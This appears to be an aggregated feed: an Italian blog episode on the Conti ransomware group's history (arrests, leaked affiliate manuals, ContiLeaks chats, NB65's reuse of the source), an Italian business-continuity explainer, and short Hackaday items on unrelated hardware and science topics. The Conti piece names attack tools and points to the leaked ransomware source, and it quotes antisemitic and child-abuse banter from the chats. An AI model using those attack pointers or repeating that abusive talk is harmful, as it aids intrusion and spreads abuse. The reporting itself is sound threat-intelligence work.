Prima di parlare delle accuse che ha dovuto affrontare, facciamo una piccola nota su come Alla Witte è stata (presumibilmente) scoperta. Prima di tutto date un’occhiata alla pagina URL haus sul sito personale di “Max”. Notate la parola chiave “RED”.

Non è la prima volta che Witte mescola la vita personale con le sue attività underground: nel Dicembre 2019, ha infettato uno dei suoi dispositivi con TrickBot rubando i dati e memorizzando tutto ciò che conteneva sul server C2 (fonte Hold Security). Inoltre, sui profili dei social media, Witte cita “Max” come una persona a lei molto vicina. In breve, l’Operational Security (OPSEC) non era tra le abilità più acute di Alla Witte, creando lacune utili alle forze dell’ordine che stavano cercando di de-anonimizzare “Max”.

All’epoca dei fatti, Witte viveva in Suriname e lavorava come sviluppatrice web freelancer. L’arresto è avvenuto a Miami il 6 febbraio 2021. L’accusa nei suoi confronti comprendeva :

1. Frode informatica e furto d’identità (aggravato)
2. Sviluppo, amministrazione e manutenzione di TrickBot
3. Distribuzione di TrickBot
4. Frode telematica e bancaria
5. Riciclaggio di denaro

È possibile trovare l’intero mandato d’arresto sul sito ufficiale del USA Justice department, dalle indagini risulta qualcosa di interessante: la reputazione di Alla Witte all’interno del gruppo. La maggior parte dei membri conosceva il suo sesso e il suo vero nome, riferendosi a lei come un figlio farebbe con la madre. Aveva prestigio per le sue capacità tecniche, i membri di TrickBot furono davvero felici di sapere che Witte era a capo del processo di sviluppo.

Le indagini hanno scoperto che l’origine di TrickBot risiede nel trojan bancario Dyre, nel 2023 Alla Witte è stata condannata a 2 anni e 8 mesi di carcere.

L’elenco era ancora lungo e Witte era solo la punta dell’iceberg. Il prossimo individuo è Vladimir Dunaev, alias “FFX” (38 anni). Residente in Russia (regione di Yakutsk), a metà ottobre 2021 Vladimir è stato arrestato in Corea del Sud (non sono stati resi noti i motivi del trasferimento) ed estradato negli Stati Uniti. Dovrà affrontare un processo con un massimo di 60 anni di carcere.

Vladimir Dunaev

BleepingComputer, a suo tempo, ha pubblicato una tabella tratta dal documento di accusa che mostra le attività di Dunaev all’interno del gruppo TrickBot

FFX si è dichiarato colpevole nel 2023 e il 20 marzo 2024 è stato condannato a 5 anni e 3 mesi di carcere. Gli sviluppatori di TrickBot sono stati messi sotto pressione da questi due arresti. I funzionari governativi statunitensi hanno dichiarato di aver identificato altri individui responsabili della distribuzione, dello sviluppo o delle attività di riciclaggio di denaro relative al gruppo del Trojan modulare.

Le operazioni di TrickBot non si sono fermate ma è chiaro che il campo di battaglia è cambiato, Conti e i governi dei principali paesi occidentali si avrebbero lottato testa a testa!

The Hermit – Snatch & Snitches

Nell’agosto 2021 la scena del ransomware si è trasformata da gatto randagio a pantera urbana: LockBit 2.0 è fuori, il flusso di denaro è più grande che mai, l’attacco Colonial Pipeline e il mercato degli Initial Access Brokers sono diventati più popolari. L’ecosistema è ormai maturo con un pizzico di “professionalità”, ma cosa succede quando sono le “dark-companies” mancano di trasparenza e onestà?

Dovremmo analizzare cosa è successo con l’utente del forum XSS chiamato m1Geelka.

Questo ex affiliato di Conti (davvero arrabbiato) ha fatto trapelare i manuali forniti agli aggressori per esfiltrare i dati e distribuire il loro ransomware. Le guide riguardavano l’ambiente Active Directory, enumeration e attacchi comuni abusando una configurazione errata o vulnerabilità note (PrintNightmare, EternalBlue e ZeroLogon).

Con un ordine, perché questa persona si è arrabbiata? Nel suo blogpost è abbastanza chiaro che la motivazione era quella di pagamenti minori basati esclusivamente su “quanto loro [Conti] faranno sapere che la vittima paga”. Il programma di affiliazione era 70/30, 70% agli attaccanti e 30% al RaaS, il punto è la differenza tra la richiesta di Conti e l’importo reale del riscatto. Purtroppo non è trapelato nulla di critico, nessun codice sorgente, nessuna chat segreta e nessuna identità rivelata. Aspettate un po’ per questo )).

Sono state scoperte alcune specifiche utilizzate dagli affiliati: un forte uso di Cobalt Strike, script powershell e procedure per esfiltrare i dati (installare agenti RDP e caricare tutto su MEGA/FileZilla upload). Le figure più tecniche si alzerebbero per un attimo con un’espressione di sorpresa sul volto, la procedura descritta è semplice, davvero basilare.

In qualche modo lo staff di Conti ha voluto creare una documentazione per gli attaccanti inesperti, probabilmente per due motivi: facilità di inganno e “quantity over quality” con attacchi standardizzati. Se le parole dell’affiliato fossero vere, significherebbe che il pagamento totale per un attacco è stato di $2100, anche senza conoscere lavittima in questione è piuttosto irrealistico dato che il riscatto medio ammontava (all’epoca) a +$100K. Possiamo credere alle parole dell’affiliato con un ampio margine di sicurezza.

Come fanno le aziende “legali”, Conti si stava approfittando di alcuni dipendenti solo per profitto. La guida conteneva alcuni indirizzi IP e alcuni IOC minori che alcuni importanti fornitori avevano aggiunto alle loro soluzioni utile per la profilazione della minaccia Conti.

Screenshot of Conti’s Active Directory Manual

Nel caso in cui vogliate entrare in contatto con i contenuti del leak, ForbiddenProgrammer ha creato un GitHub pubblico con tutto il necessario.

Four of Swords – Operational Briefing

Finora abbiamo trattato molto di Conti in termini di evoluzione e di tempistica, ma prima di continuare il nostro viaggio è necessario fermarsi e menzionare alcuni attacchi effettuati da Conti RaaS nel 2021. Abbiamo già parlato dell’attacco ransomware ai danni del HSE irlandese, quindi vediamo di analizzare altre operazioni significative.

• London Graff Jewellers: Alla fine di ottobre Conti è riuscita a esfiltrare e criptare i dati di Graff Jewellers, un noto marchio britannico. Conti ha pubblicato 61.000 file sul proprio DLS, affermando che si trattava solo dell’1% del totale dei file esfiltrati; i file contenevano informazioni sulla fatturazione e sulle spedizioni di VIP come David Beckham, Donald Trump e membri delle famiglie reale arabe. Graff ha dovuto chiudere le proprie reti e durante le indagini forensi ha ritenuto che fossero stati rubati 11.000 dati di clienti. Conti ha chiesto decine di milioni come riscatto. L’11 novembre Conti decise di pubblicare un aggiornamento sull’attacco londinese di Graff, affermando che cancellerà definitivamente i file relativi alle famiglie arabe, dell’EAU e del Qatar, mentre rilascerà i dati relativi alla “plutocrazia neoliberale USA-Regno Unito-UE”. Dichiarazione interessante, l’“anima” del gruppo li ha spinti a danneggiare il più possibile i Paesi occidentali in ogni attacco che compiono. Si cita anche il Daily Mail per l’articolo che ha fatto capire al RaaS che tipo di dati sono stati trafugati, rimanendo fedele alle parole di Conti che non ha analizzato correttamente i contenuti esfiltrati.

• JVCKenwood: Anche la multinazionale giapponese ha avuto l’onore di essere pubblicata su Conti DLS. 7 MLN di dollari di riscatto per il decryptor e la non pubblicazione di 1,7 TB che sono stati rubati, come prova hanno fornito una scansione PDF del passaporto di un dipendente. I server colpiti sono stati quelli responsabili delle vendite in Europa. L’azienda ha dichiarato che l’accesso non autorizzato ai propri server ha avuto origine da un gruppo sussidiario residente in Europa, l’ipotesi dei professionisti è che Conti abbia acquistato l’accesso da uno IAB.

• Exagrid: Dopo meno di un mese dall’attacco dell’HSE irlandese, una nuova vittima è stata costretta a fare i conti con Conti: si tratta di Exagrid, una società di backup a livelli. Il gruppo ha dichiarato di aver criptato server SQL e file server, rubando 800 GB di dati. Sono rimasti all’interno della rete per un mese “abbastanza per studiare tutta la vostra documentazione”. L’azienda ha negoziato fino al 13 maggio, quando è stato raggiunto un accordo: in un primo momento il RaaS ha offerto uno sconto di 1 MLN di dollari, ma le trattative si sono concluse con un accordo di pagamento di 2,6 MLN di dollari. Un dettaglio curioso è che dopo l’invio del decriptatore Exagrid ne ha richiesto uno nuovo perché quello originale era stato distrutto per errore. Questo attacco è stato un colpo critico al prestigio dell’azienda, che è stata premiata 7 volte con riconoscimenti del settore per essere tra “le migliori soluzioni per le procedure di recupero a seguito di attacchi ransomware”.

• Broward County Schools: Il 7 marzo 2021, il distretto delle scuole pubbliche della contea di Broward ha trovato l’infrastruttura distrutta e non disponibile. Non ci è voluto molto prima che trovassero una nota di riscatto da parte del “ContiLocker Team” con un link alla chat di negoziazione. Qui abbiamo alcune schermate della chat che sono piuttosto interessanti da leggere. Conti ha chiesto un riscatto di 40 MLN di dollari poiché, come hanno dichiarato, il distretto colpito ha un fatturato di 2 BLN di dollari. Per il RaaS sembrava un prezzo “ragionevole” per il recupero. La contea di Broward è un distretto scolastico pubblico e non privato, ma Conti ha sostenuto il contrario: quando il rappresentante della vittima ha chiesto un pagamento di 500.000 dollari, il gruppo ha risposto con “Ragazzi, siete stati assunti dalle Broward Schools e sappiamo esattamente chi siete […] Abbiamo pagato e assunto la società di outsourcing e sappiamo esattamente che la vostra società di recupero ha ricevuto un bonifico da Broward (bankofamerica), ecco perché siamo pronti ad accettare 10 milioni di dollari”. Il rappresentante mantiene la sua posizione, Conti decide di abbandonare la trattativa e di caricare pubblicamente la chat.

Al di fuori degli attacchi Conti nel 2021 ha deciso di vendere l’accesso delle vittime terzi con una nuova funzionalità del proprio modello di business. Il RaaS estendeva le funzionalità del malware e gli strumenti per far saltare il backup delle vittime. Conti è cresciuta in termini di denaro, affiliati e capacità. Non perdono occasione per fare l’occhiolino o per far vergognare i paesi occidentali (Stati Uniti, Regno Unito e Unione Europea) e nel frattempo guadagnare il più possibile.

The World – No Angels in the game, just Demons

Il 2022 è iniziato e Conti ha continuato a popolare il DLS. Tutto stava tornando al normale benessere dopo 2 anni di COVID-19 e di perdite economiche, lentamente il mondo si stava riprendendo ed era pronto a stabilizzarsi. Il 24 febbraio il presidente Putin annunciò il dispiegamento di truppe russe nel Donbass per sostenere i corpi separatisti nelle regioni di Donetsk e Luhansk proteggendoli dal “genocidio” causato dall’Ucraina, pochi minuti dopo le sue parole si trasformarono in realtà. Il resto è storia pronta ad essere scritta quando la guerra avrà raggiunto la sua conclusione.

In quel periodo i gruppi di ransomware non erano troppo espliciti sulle loro posizioni politiche pubblicamente, non è una buona idea mischiare la politica con il business. Il 25 febbraio Conti pubblica un nuovo post sul DLS, questa volta senza nuove vittime. Solo un messaggio al mondo.

Si tratta di una novità nel panorama dei ransomware. Conti non si limita a prendere posizione, ma minaccia anche gli altri Paesi di non attaccare con “qualsiasi attività di guerra” contro la Russia, pena ritorsioni digitali.

I titoli dei giornali sono stati inondati dalle loro dichiarazioni, mentre i non addetti ai lavori erano confusi, scettici o spaventati. È difficile da digerire quando lo stesso gruppo che ha bloccato buona parte del sistema sanitario irlandese è pronto a premere il grilletto sulle tue infrastrutture critiche.

Per un po’ il silenzio e la tensione sono stati gli unici elementi che hanno dominato la stanza. In meno di una settimana qualcosa di nuovo ha scosso, ancora una volta, l’ambiente dell’infosec, ma questa volta non da Conti.

Il 27 febbraio Conti ha capito che la sua posizione e le sue minacce avevano un prezzo e un security researcher ucraino era lì pronto a rispondere una volta per tutte. L’account ContiLeaks su Twitter/X ha annunciato con un link che sono trapelati 13 mesi di registri di chat di Conti.

twitter.com/ContiLeaks/status/…

Tutti i messaggi dal 29 gennaio (2021) al 27 febbraio (2022) sono ora disponibili per tutti. I messaggi provengono da un server Jabber e dai log di Rocket Chat. Alcuni nomi utente sono ricorrenti: Defender, Stern, Mango e Target (quest’ultimo da tenere presente), solo per citarne alcuni. Anche “Max” (Alla Witte) è presente nei log di chat.

Check Point Research ha fatto un lavoro straordinario con un’analisi approfondita dei log delle chat, e qualcosa di speciale è il loro grafico che rappresenta l’organigramma del gruppo.

Anche se si trattava solo di un piccolo graffio, ciò che è emerso dall’analisi è stato tra il brillante e il sorprendente. La struttura del gruppo è davvero lontana da un semplice gruppo di specialisti informatici. Risorse umane, sysadmin, affiliati, negoziatori, operatori e sviluppatori sono ben distinti tra loro, con orari e giorni di riposo come in una normale azienda. Hanno anche progetti esterni al malware, come la creazione di un social media per i blackhats. Anche il programma “dipendente del mese” faceva parte della struttura aziendale di Conti: gli individui che ottenevano risultati migliori venivano ricompensati con una busta paga extra.

Per capire quanto siano professionali queste persone si tenga conto che quando è uscito Windows 11 Conti aveva un team responsabile proprio del reverse engineering del software alla ricerca di nuovi exploit e abusi.

Le chat includono reclutamento, aggiornamenti, richieste di eseguibili/DLL per la crittografia e relazioni con altre famiglie di ransomware come Ryuk, Maze e LockBit (a quanto pare, LockBitSupp in persona si è unito alla chat con lo pseudonimo “Brom”). Una buona parte del processo di sviluppo riguardava l’elusione degli AV, dove i “dipendenti” chiedevano al loro “supervisore” di acquistare CarbonBlack AV e altri importanti prodotti AV/EDR. Lo stesso vale per il Reverse Engineering e i test, per i quali è stato acquistato un SonicWall ricondizionato (SMA 410, il nuovo modello dell’epoca).

ContiLeaks non era abbastanza soddisfatto e così l’1 e il 2 marzo ha rilasciato nuovi log freschi dai jabbers

twitter.com/ContiLeaks/status/…

twitter.com/ContiLeaks/status/…

twitter.com/ContiLeaks/status/…

Su queste nuove chat abbiamo una conversazione tra Mango e JhonyBoy77 in cui si parla di una email esfiltrata riguardo Alexei Navalny

Inoltre, le chat hanno incluso l’opinione dei membri sull’Ucraina, la Russia e la guerra nel Donbass.

Patrick: La guerra era inevitabile, l’Ucraina ha presentato una richiesta per le armi nucleari in suo possesso
Weldon: le scimmie non spiegano le cose, si arrampicano sugli alberi
Elijah: @patrick ben fatto e fatto. Comunque, nessuno la userà mai. Sì, solo per spaventare
Elijah: Guardate, i missili della Corea del Nord arrivano periodicamente nelle acque territoriali della Federazione Russa. Ma nessuno se ne preoccupa. E tra l’altro hanno armi nucleari. Ma in qualche modo nessuno si è allarmato
Patrick: vecchio mio, ti sbagli, non ci sono dubbi sulla Corea del Nord ora. Nessuno è contento della guerra, fratelli, ma è ora di processare questa banda neonazista di figli adottivi di Canaris.

La loro idea su Zelensky non è ovviamente tenera e hanno colto l’occasione per sottolineare le sue origini ebraiche

Weldon: Zelensky è un ebreo. Oh, cazzo!
Kermit: Ebrei. Oh, fantastico. I miei preferiti
Weldon: Esatto, non ebreo, ma ebreo.
Kermit: cazzo, vorrei essere ebreo. basta nascere ebreo per essere considerato membro di una società segreta e incasinare la vita dei russi.
Weldon: è nato un tartaro – ha pianto un ebreo
Gelmut: tartaro nero di Crimea nato a Odessa, che ha ricevuto la cittadinanza russa 😀
Weldon: Obama?
Gelmut: Un bambino ebreo si avvicina ai genitori e dice: “Voglio essere russo”. Al che i genitori rispondono: – Se vuoi essere russo, vai all’angolo e stai lì tutto il giorno senza cibo. Mezza giornata dopo, i genitori chiedono: “Come fai a vivere da russo? E il ragazzo risponde: – Sono russo solo da due ore, ma già odio voi ebrei.

Sempre in riferimento all’Ucraina, definiscono Holomodor come una sorta di “favola”.

Molti messaggi sessisti e omofobici sono stati inviati nella chat di rocket senza alcun problema con gli altri membri a seguirli.

La cosa più disturbante è il “black humor” sugli abusi ai danni dei bambini

Angelo: è possibile scopare le ragazze mentre dormono?
Elroy: No, dormi abbastanza, poi, la sera…
Angelo: ok, rimetto la cassetta a posto
Benny: filmato iconico…

Inoltre, condividono con gli altri ciò che stanno guardando

Kermit: dopo il mio link tutti sono andati a provare sicuramente
Angelo: cp che cos’è?
Kermit: Pornografia infantile (“child porngraphy”)
Angelo: No, anche sotto i 17 anni non c’è modo
Kermit: Dai
Angelo: Beh, 16
Kermit: A 16 anni ci sono certe ”lyali”

A prescindere da questi argomenti di discussione problematici e inquietanti, la maggior parte dei messaggi mostra che i ragazzi di Conti sono persone normali con la loro vita quotidiana, i loro vizi e le loro famiglie. Le loro tesi sull’Ucraina e altri individui anti-russi sono in linea con la narrativa russa, la decisione di sostenere esplicitamente la Russia non è un qualcosa della quale sorprendersi.

Le chat non sono state l’unica cosa a provenire dalla clandestinità: sono stati leakati anche i codici sorgente del ransomware Conti e del backend di TrickBot. Quest’ultimo è stato estremamente utile per raccogliere tutti gli IoC e prevenire alcuni degli attacchi che utilizzavano quell’infrastruttura, un buon colpo visto che lo strumento è stato pesantemente utilizzato nelle operazioni di ransomware.

Il codice sorgente di Conti ha una storia completamente diversa, il vero ritorno di fiamma deve ancora arrivare. Un gruppo di hacker sotto l’etichetta NB65 ha infranto le regole non scritte del Ransomware: Mai. Attaccare. paesi. CIS. Hanno preso il codice sorgente trapelato, modificato alcune parti e rimosso le salvaguardie linguistiche che evitava la crittografia all’interno della macchina dei Paesi della CSI. Quando tutto era pronto, hanno iniziato ad attaccare le aziende russe e, invece delle tipiche note di riscatto che richiedono il pagamento di un riscatto, hanno scritto una nota testuale che avverte che gli attacchi sono dovuti all’invasione dell’Ucraina da parte della Russia.

Le aziende colpite sono Tensor (operatore gestionale di documenti), Roscosmos (industria spaziale) e VGTKR (nota azienda radiotelevisiva di proprietà della Russia). VGTKR è stata colpita da un’enorme esfiltrazione di dati, 786,2 GB, la maggior parte dei quali sono e-mail e file. Questa volta non c’è DLS, tutto può essere trovato sulla pagina web di Distributed Denial of Secret. I documenti sensibili trapelati includono prove dell’influenza del Cremlino sulla direzione dei contenuti trasmessi e alcuni “consigli” su come coprire eventi specifici direttamente dall’FSB.

twitter.com/xxNB65/status/1507…

twitter.com/xxNB65/status/1534…

Conti ha imparato che le provocazioni non sono sempre la scelta migliore, la sua posizione sull’Ucraina ha probabilmente fatto arrabbiare molte persone anche all’interno del suo stesso gruppo. ContiLeaks ha rilasciato un’intervista alla CNN fornendo alcune informazioni sulla propria missione.

Ha confermato di essere ucraino e ha motivato la fuga di notizie con “Non so sparare, ma posso combattere con una tastiera e un mouse”. Secondo l’intervista, passava le giornate all’interno di un bunker con il suo computer portatile ad esfiltrare ogni possibile messaggio. Ha aggiunto che l’FBI lo ha contattato direttamente chiedendogli di fermarsi per non intralciare le loro indagini, lui si è fermato per un po’ ma ha completato la fuga di notizie indipendentemente dalle raccomandazioni dell’FBI.

L’FBI ha suggerito di rimanere con un accesso segreto e di contribuire direttamente con le forze dell’ordine, il motivo è (probabilmente) la tensione che era già in gioco con la guerra. Biden e Putin hanno avuto una telefonata nel 2021, dopo la quale alcuni importanti membri del REvil sono stati arrestati in Russia, questa è stata la prima sorta di collaborazione tra i due Stati in termini di arresti relativi a crimini digitali. Probabilmente le azioni di ContiLeaks hanno contribuito a rompere la sottile collaborazione tra l’aquila e la grande orso.

The FBI suggested to remain with a covert access and contribute directly with law enforcement, the reason behind this is (probably) for the tension that was already in play with the war. Biden and Putin had a call in 2021, after that some major REvil members have been arrested in Russia, this was the first sort of collaboration between the two states in terms of digital crime arrests. Probably the actions of ContiLeaks have contributed to broke the thin collaboration between the eagle and the bear.

• Conti leaks (originale & tradotto)
• Codice Sorgente di Conti

Ace of Pentacles – 406, Not Accettable

Il leak di Conti può essere descritto come i Panama Papers del Ransomware-as-a-Service, si sono definiti e hanno agito come patrioti. Mostrare cosa c’è dietro le tende è stato sensazionale, la sostanza dietro la forma era altamente organizzata con un fitto flusso di lavoro e scadenze. La “società” ha anche aiutato Alla Witte con le spese processuali donandole 10.000 dollari.

Avevano risorse umane, campagne di reclutamento e tutto ciò che è analogo a un’azienda reale. Semplicemente sorprendente. D’ora in poi la comunità CTI sarà davvero consapevole della portata di ogni gruppo, un esempio perfetto è stato LockBit che ha fatto della professionalità l’attributo principale del primo e unico “marchio” ransomware mai esistito.

I legami con il governo russo non erano un problema, ma avere le prove di fronte a voi vi può comunque fare un certo effetto. Non solo prendevano il loro nazionalismo molto seriamente, ma agivano per dimostrarlo ogni volta che ne avevano l’opportunità.

I primi arresti e il fuoco amico hanno messo Conti, in questa parte della storia, in una situazione pericolosa. L’uso di un proprio ransomware nello stesso territorio che sostenevano di proteggere è stato un duro colpo per la reputazione del gruppo.

Ai lettori: Non si deve confondere ciò che si legge in questo articolo con la norma di ogni RaaS o minaccia digitale in circolazione. Lo stereotipo del “malvagio hacker russo”, come tutti gli stereotipi, ha una base reale ma non è sufficiente per generalizzare l’intero panorama. La maggior parte dei gruppi non parla (almeno esplicitamente) di politica e nazionalismo come ha fatto Conti. Ovviamente, hanno solo vantaggi finché rispettano la regola “No CIS”, ma questo non significa automaticamente che le loro azioni siano sponsorizzate dallo Stato o motivate dal nazionalismo. Per favore, prendete con attenzione dei titoli di testate non tecniche e fate una distinzione tra attori sponsorizzati dallo Stato e gruppi RaaS.

La storia di Conti è ancora lontana dalla sua conclusione, ci sono molte sorprese che vale la pena raccontare. Nel prossimo episodio scopriremo cosa succede quando il RaaS più malato della scena viene umiliato. Ricordate l’utente chiamato “Target”? Sarà lui uno dei nuovi protagonisti del prossimo episodio, godetevi l’immagine qui sotto come trailer per la prossima parte.

To be CONTInued…

• Link al primo episodio

L'articolo La Storia Di Conti Ransomware – La guerra all’epoca del Ransomware (Episodio 2) proviene da il blog della sicurezza informatica.

Oggi più che mai, le aziende si trovano a dover affrontare rischi e minacce di ogni tipo: dagli attacchi informatici ai disastri naturali, fino a interruzioni operative impreviste. Per rispondere in modo efficace a queste sfide e garantire continuità operativa, esistono diverse metodologie e strumenti che, lavorando insieme, formano un sistema integrato di protezione.

Parliamo di Risk Assessment (RA), Business Impact Analysis (BIA), Business Continuity Plan (BCP), Disaster Recovery Plan (DRP) e Incident Response Plan (IRP).

Questi termini, apparentemente tecnici, sono in realtà facili da comprendere quando vengono collocati in un flusso logico. Vediamo cosa sono e, soprattutto, come si inseriscono nella giusta sequenza temporale per costruire una strategia efficace.

Partire dall’inizio: Risk Assessment (RA)

Il punto di partenza è sempre il Risk Assessment, ossia la valutazione dei rischi. Questo processo serve a identificare cosa potrebbe andare storto all’interno dell’organizzazione, quali sono le vulnerabilità più rilevanti e quali rischi potrebbero avere un impatto significativo. Ad esempio, si valutano le probabilità di attacchi informatici, blackout elettrici, terremoti o altri eventi critici.

Ma perché è importante iniziare da qui? Perché senza una mappa chiara dei rischi, sarebbe impossibile pianificare come mitigarli o gestirli. Il Risk Assessment diventa così la base per tutte le fasi successive: identifica le minacce, valuta i loro impatti e aiuta a stabilire le priorità.

Capire l’impatto: Business Impact Analysis (BIA)

Una volta che abbiamo capito quali rischi corriamo, dobbiamo chiederci: “Che impatto avrebbe questo rischio sulle operazioni aziendali?”. Ecco dove entra in gioco la Business Impact Analysis. Questa analisi ci permette di identificare quali processi aziendali sono davvero critici e quanto tempo possiamo sopportare un’interruzione prima che ci siano danni significativi.

Facciamo un esempio pratico: immagina un’azienda di e-commerce. La BIA ci dirà che il sito web e il sistema di pagamento sono processi critici e che un’interruzione di più di qualche ora potrebbe comportare perdite economiche importanti, oltre che danni alla reputazione. Con queste informazioni, possiamo stabilire su cosa concentrarci in caso di emergenza.

Pianificare la continuità: Business Continuity Plan (BCP)

Ora che conosciamo i rischi e i processi critici, è il momento di sviluppare un piano per mantenere l’azienda operativa anche durante una crisi: il Business Continuity Plan. Questo documento descrive cosa fare per garantire che l’azienda continui a funzionare, o riprenda il prima possibile, in caso di interruzioni.

Ad esempio, il BCP può includere strategie come spostare i dipendenti in sedi alternative, attivare backup dei dati o stabilire comunicazioni di emergenza con i clienti. È importante che il BCP sia pratico e ben testato: non basta scriverlo, bisogna assicurarsi che funzioni davvero.

Ripristinare i sistemi: Disaster Recovery Plan (DRP)

Tra le parti fondamentali del BCP c’è il Disaster Recovery Plan, che si concentra esclusivamente sui sistemi tecnologici. Se un attacco informatico manda offline i server o se un disastro naturale danneggia i data center, il DRP descrive come ripristinare i sistemi IT nel minor tempo possibile.

Perché è importante distinguere il DRP dal BCP? Perché il DRP si concentra solo sull’aspetto tecnologico, come il recupero di dati da backup o la riconfigurazione di infrastrutture IT. Senza un DRP efficace, molte aziende non riuscirebbero a riprendere le loro attività operative.

Gestire gli incidenti: Incident Response Plan (IRP)

Infine, c’è il Incident Response Plan, che si occupa di gestire gli incidenti specifici, come attacchi hacker o violazioni di dati. L’IRP descrive come rilevare e rispondere rapidamente a questi eventi, limitando i danni e minimizzando i tempi di interruzione.

Ad esempio, se un ransomware colpisce l’azienda, l’IRP stabilisce chi deve intervenire, quali azioni intraprendere immediatamente (come isolare i sistemi infetti) e come comunicare con le parti coinvolte. L’obiettivo è contenere il problema prima che si espanda.

La giusta sequenza temporale

Questi strumenti non lavorano in isolamento, ma si inseriscono in una sequenza logica che permette di costruire una strategia completa:

1. Risk Assessment (RA): Individua i rischi e le vulnerabilità.
2. Business Impact Analysis (BIA): Determina quali processi aziendali sono più critici e quali impatti avrebbe un’interruzione.
3. Business Continuity Plan (BCP): Pianifica come mantenere o ripristinare le operazioni aziendali.
4. Disaster Recovery Plan (DRP): Dettaglia come ripristinare i sistemi IT e le infrastrutture tecnologiche.
5. Incident Response Plan (IRP): Definisce come gestire incidenti specifici e contenere le emergenze.

Un sistema integrato per la resilienza aziendale

Questi strumenti non sono “a sé stanti”, ma lavorano insieme per garantire che un’organizzazione possa prevenire, affrontare e riprendersi da eventi avversi. Il Risk Assessment e la Business Impact Analysis forniscono le basi; il Business Continuity Plan rappresenta la visione strategica, mentre il Disaster Recovery Plan e l’Incident Response Plan si concentrano sulle azioni operative.

Implementare correttamente queste analisi e piani non solo riduce i rischi, ma aumenta la fiducia dei clienti, dei dipendenti e degli stakeholder, garantendo che l’azienda sia pronta ad affrontare qualsiasi sfida.

L'articolo Analisi e Pianificazione per la Resilienza Aziendale: Comprendere RA, BIA, BCP, DRP e IRP proviene da il blog della sicurezza informatica.

If you live near Central Park or some other local chess hub, you’re likely never short of opponents for a good game. If you find yourself looking for a computer opponent, or you just prefer playing online, you might like this LED chessboard from [DIY Machines] instead.

At heart, it’s basically a regular chessboard with addressable LEDs of the WS2812B variety under each square. The lights are under the command of an Arduino Nano, which is also tasked with reading button inputs from the board’s side panel. The Nano is interfaced with a Raspberry Pi, which is the true brains of the operation. The Pi handles chess tasks—checking the validity of moves, acting as a computer opponent, and connecting online for games against other humans if so desired. Everything is wrapped up with 3D printed parts, making this an easy project to build for the average DIY maker.

The video tutorial does a great job of covering the design. It’s a relatively simple project at heart, but the presentation is great and it looks awfully fun to play with. We’ve featured some other great builds from [DIY Machines] before, too. Video after the break.

youtube.com/embed/Z92TdhsAWD4?…

hackaday.com/2024/11/25/buildi…

There’s an old joke that they want to send an exploratory mission to the sun, but to save money, they are going at night. The European Space Agency’s Solar Orbiter has gotten as close as anything we’ve sent to study our star on purpose, and the pictures it took last year were from less than 46 million miles away. That sounds far away, but in space terms, that’s awfully close to the nuclear furnace. The pictures are amazing, and the video below is also worth watching.

Because the craft was so close, each picture it took was just a small part of the sun’s surface. ESA stitched together multiple images to form the final picture, which shows the entire sun as 8,000 pixels across. We’ll save you the math. We figure each pixel is worth about 174 kilometers or 108 miles, more or less.

The stunning images used the Polarimetric and Helioseismic Imager and the Extreme Ultraviolet Imager. The first instrument snapped the visible light and the magnetic field lines. It also provided a velocity map. The UV instrument took pictures of the corona.

Understanding the sun is important because it greatly impacts our life on Earth. Technology is especially sensitive, and, lest we forget, massive solar disruptions have happened before.

youtube.com/embed/SgTBMzjuqX0?…

hackaday.com/2024/11/25/solar-…

[Stephen] has a basement that depends on a sump pump. What that means is if the pump fails or the power goes out, the basement floods—which is rather undesirable. Not wanting to rely on a single point of failure, [Stephen] decided to build a monitor for the basement situation, which quickly spiralled to a greater degree of complexity than he initially expected.

The initial plan was just to have water level sensors reporting data over a modified CATS packet radio transmitter. On the other end, the plan was to capture the feed via a CATS receiver, pipe the data to the internet via FELINET, and then have the data displayed on a Grafana dashboard. Simple enough. From there, though, [Stephen] started musing on the possibilities. He thought about capturing humidity data to verify the dehumidifier was working. Plus, temperature would be handy to get early warning before any pipes were frozen in colder times. Achieving those aims would be easy enough with a BME280 sensor, though hacking it into the CATS rig was a little challenging.

The results are pretty neat, though. [Stephen] can now track all the vital signs of his basement remotely, with all the data displayed elegantly on a nice Grafana dashboard. If you’re looking to get started on a similar project, we’ve featured a great Grafana guide at a previous Supercon, just by the by. All in all, [Stephen’s] project may have a touch of the old overkill, but sometimes, the most rewarding projects are the ones you pour your heart and soul into!

hackaday.com/2024/11/25/an-ove…

Analog dials used to be a pretty common way of displaying information on test equipment and in industrial applications. They fell out of favor as more advanced display technologies became cheaper. However, if you combine an analog dial with a modern e-ink display, it turns out you get something truly fantastic indeed.

This build comes to us from [Arne]. The concept is simple—get an e-ink display, and draw a dial on it using whatever graphics and scale you choose. Then, put it behind a traditional coil-driven analog dial in place of the more traditional paper scale. Now, you have an analog dial that can display any quantity you desire. Just update the screen to display a different scale as needed. Meanwhile, if you don’t need to change the display, the e-ink display will draw zero power and still display the same thing.

[Arne] explains how it all works in the writeup. It’s basically a LilyGo T5 ESP32 board with an e-ink screen attached, and it’s combined with a MF-110A multimeter. It’s super easy to buy that stuff and start tinkering with the concept yourself. [Arne] uses it with Home Assistant, which is as good an idea as any.

You get all the benefits of a redrawable display, with the wonderful visual tactility of a real analog dial. It’s a build that smashes old and new together in the best way possible. It doesn’t heart that [Arne] chose a great retro font for the dial, either. Applause all around!

hackaday.com/2024/11/25/e-ink-…

[MindYourDecisions] presents a Babylonian tablet dating back to around 1800 BC that shows that the hypotenuse of a unit square is the square root of two or 1.41421. How did they know that? We don’t know for sure how they computed it, but experts think it is the same as the ancient Greek method written down by Hero. It is a specialized form of the Newton method. You can follow along and learn how it works in the video below.

The method is simple. You guess the answer first, then you compute the difference and use that to adjust your estimate. You keep repeating the process until the error becomes small enough for your purposes.

For example, suppose you wanted to take the square root of 85. You can observe that 9 squared is 81, so the answer is sort of 9, right? But that’s off by 4 (85-81=4). So you take that number and divide it by the current answer (9) multiplied by two. In other words, the adjustment is 4/18 or 0.2222. Putting it together, our first answer is 9.2222.

If you square that, you get about 85.05 which is not too bad, but if you wanted closer you could repeat the process using 9.2222 in place of the 9. Repeat until the error is as low as you like. Our calculator tells us the real answer is 9.2195, so that first result is not bad. A second pass gives 9.2193, You could keep going, but that’s close enough for almost any purpose.

The video shows a geographical representation, and if you are a visual thinker, that might help you. We prefer to think of it algebraically. You are essentially creating each adjustment by adding the guess and the square divided by the guess and averaging them.

The ancients loved to estimate numbers. And Hero was into a lot of different things.

youtube.com/embed/MXveVqBxFow?…

hackaday.com/2024/11/25/square…

